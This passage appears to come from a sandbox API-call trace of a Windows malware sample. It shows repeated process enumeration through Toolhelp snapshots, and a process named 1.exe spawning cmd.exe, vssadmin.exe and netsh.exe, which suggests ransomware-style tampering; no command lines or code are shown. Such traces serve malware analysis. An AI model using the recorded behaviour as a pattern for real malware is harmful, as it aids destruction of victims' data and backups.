cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.840] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.841] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.842] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.842] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.843] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.844] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.845] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.845] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.846] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0064.847] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.848] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.848] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0064.849] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0064.850] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0064.850] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0064.851] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0064.852] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0064.853] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x41, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0064.853] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0064.854] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0064.855] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0064.855] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0064.856] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0064.857] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0064.857] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0064.858] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0064.859] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0064.859] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0064.860] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0065.450] GetLastError () returned 0x12 [0065.451] SetLastError (dwErrCode=0x12) [0065.456] GetLastError () returned 0x12 [0065.458] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0065.464] GetLastError () returned 0x12 [0065.464] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0065.465] GetLastError () returned 0x12 [0065.465] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver-fireplace.exe")) returned 1 [0065.466] GetLastError () returned 0x12 [0065.466] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="upperarcobviously.exe")) returned 1 [0065.467] GetLastError () returned 0x12 [0065.467] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets.exe")) returned 1 [0065.467] GetLastError () returned 0x12 [0065.467] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="lottery.exe")) returned 1 [0065.468] GetLastError () returned 0x12 [0065.468] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="meanwhile.exe")) returned 1 [0065.469] GetLastError () returned 0x12 [0065.469] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhz-archived-deemed.exe")) returned 1 [0065.469] GetLastError () returned 0x12 [0065.470] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="compare-hh.exe")) returned 1 [0065.470] GetLastError () returned 0x12 [0065.470] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten.exe")) returned 1 [0065.471] GetLastError () returned 0x12 [0065.471] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization-tail.exe")) returned 1 [0065.471] GetLastError () returned 0x12 [0065.472] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="das.exe")) returned 1 [0065.472] GetLastError () returned 0x12 [0065.472] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mixture.exe")) returned 1 [0065.473] GetLastError () returned 0x12 [0065.473] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federation customs.exe")) returned 1 [0065.474] GetLastError () returned 0x12 [0065.474] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boating.exe")) returned 1 [0065.474] GetLastError () returned 0x12 [0065.474] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="manager.exe")) returned 1 [0065.475] GetLastError () returned 0x12 [0065.475] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="favors_disagree.exe")) returned 1 [0065.476] GetLastError () returned 0x12 [0065.476] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="grove_fame_lightning.exe")) returned 1 [0065.477] GetLastError () returned 0x12 [0065.477] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="camel.exe")) returned 1 [0065.478] GetLastError () returned 0x12 [0065.478] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_click_charter.exe")) returned 1 [0065.479] GetLastError () returned 0x12 [0065.479] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="md-upgrading.exe")) returned 1 [0065.480] GetLastError () returned 0x12 [0065.480] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="conservative warnings.exe")) returned 1 [0065.480] GetLastError () returned 0x12 [0065.480] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="indonesian.exe")) returned 1 [0065.481] GetLastError () returned 0x12 [0065.481] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0065.482] GetLastError () returned 0x12 [0065.482] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xfcc, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.483] GetLastError () returned 0x12 [0065.483] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfa4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.484] GetLastError () returned 0x12 [0065.484] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0065.485] GetLastError () returned 0x12 [0065.485] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0065.486] GetLastError () returned 0x12 [0065.486] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.487] GetLastError () returned 0x12 [0065.487] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0065.487] GetLastError () returned 0x12 [0065.487] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xc48, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0065.488] GetLastError () returned 0x12 [0065.488] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.489] GetLastError () returned 0x12 [0065.489] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.490] GetLastError () returned 0x12 [0065.490] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0065.491] GetLastError () returned 0x12 [0065.491] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xef4, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.491] GetLastError () returned 0x12 [0065.491] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0065.492] GetLastError () returned 0x12 [0065.492] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0065.493] GetLastError () returned 0x12 [0065.493] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0065.494] GetLastError () returned 0x12 [0065.494] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0065.494] GetLastError () returned 0x12 [0065.494] Process32NextW (in: hSnapshot=0x344, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0065.495] CloseHandle (hObject=0x344) returned 1 [0065.495] Sleep (dwMilliseconds=0x1f4) [0066.256] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x300 [0066.262] Process32FirstW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.262] GetLastError () returned 0x12 [0066.262] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0066.263] GetLastError () returned 0x12 [0066.263] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0066.264] GetLastError () returned 0x12 [0066.264] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0066.265] GetLastError () returned 0x12 [0066.265] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0066.265] GetLastError () returned 0x12 [0066.265] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0066.266] GetLastError () returned 0x12 [0066.266] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0066.267] GetLastError () returned 0x12 [0066.267] Process32NextW (in: hSnapshot=0x300, lppe=0x2d6f554 | out: lppe=0x2d6f554*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, 